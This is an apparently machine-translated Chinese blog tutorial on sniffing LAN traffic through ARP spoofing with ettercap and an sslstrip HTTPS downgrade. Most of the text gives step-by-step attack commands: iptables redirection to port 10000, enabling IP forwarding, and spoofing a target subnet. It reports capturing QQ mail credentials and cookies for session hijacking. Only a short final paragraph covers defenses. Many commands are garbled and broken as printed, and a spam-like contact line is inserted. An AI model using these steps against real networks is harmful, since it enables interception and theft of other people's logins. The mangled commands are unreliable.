无线网络嗅探,无线网嗅探是什么,无线电嗅探
首先声明这不是原创,而且这个工具也比较老。主要是帮助你了解一点黑客是如何在局域网中获取数据的。我们先来看程序运行的逻辑图。
一、准备工作:
我们需要安装几个软件。我的环境是centos6.5。
使用yum安装
Yum-y安装ettercap yum-y安装arpspoof sslstripyum-y安装arpspoof yum-y安装dsniff ssldump two-on路由转发
因为伪装成路由器后需要将用户的数据转发给路由器,所以需要开启我的机器的路由转发功能。
echo 1 /proc/sys/net/IP v4/IP _ forward #也可以手动修改。
打开iptables三次
通过iptables将http数据导入端口10000。我们使用sslstrip来监控端口10000,并获得我们想要的数据。
iptables-t NAT-a routing-p TCP-destination-port 80-j redirect-to-port 10000-t表示要操作的表。nat表示NAT表被修改。
-附加数据路由前链,用于在路由前将规则附加到链中。
-p是指过滤后的数据包的协议。
- destination-port 80表示过滤后的数据包的目的端口是80,之后将端口80的数据转发到端口10000。
四个启动sslstrip监控端口10000
sslstrip -l 10000
使用ettercap进行arp欺骗(即伪装成路由器)
eter cap-t-q-m ARP:remote/172 . 16 . 85 . 1/172 . 16 . 85 . 2/-t表示基于文本的界面运行在linux中。
-q静音模式(无回声)
-M开始arp欺骗攻击(这一步是伪装路由器)
//填写被嗅探机器的IP,可以填写网段表示嗅探一个网段表示一些信息。
效果:
我们登录qq,得到了qq邮箱的登录账号和密码,但是密码是加密的。我们只能通过下载cooki导入自己的电脑来登录,无法直接获取密码。
更多Python视频、源代码和资料可以免费获得,电话:725638078。
让我们来谈谈防御:
Sslstrip的攻击方式是中间人攻击,需要arp欺骗。也就是说,如果你拿不到你的数据,他的工具再好,他也破解不了你的数据。所以我们需要设置好浏览器本身的安全性,绑定mac和ip,将网关双向绑定到本机,或者启动arp防火墙防御arp攻击。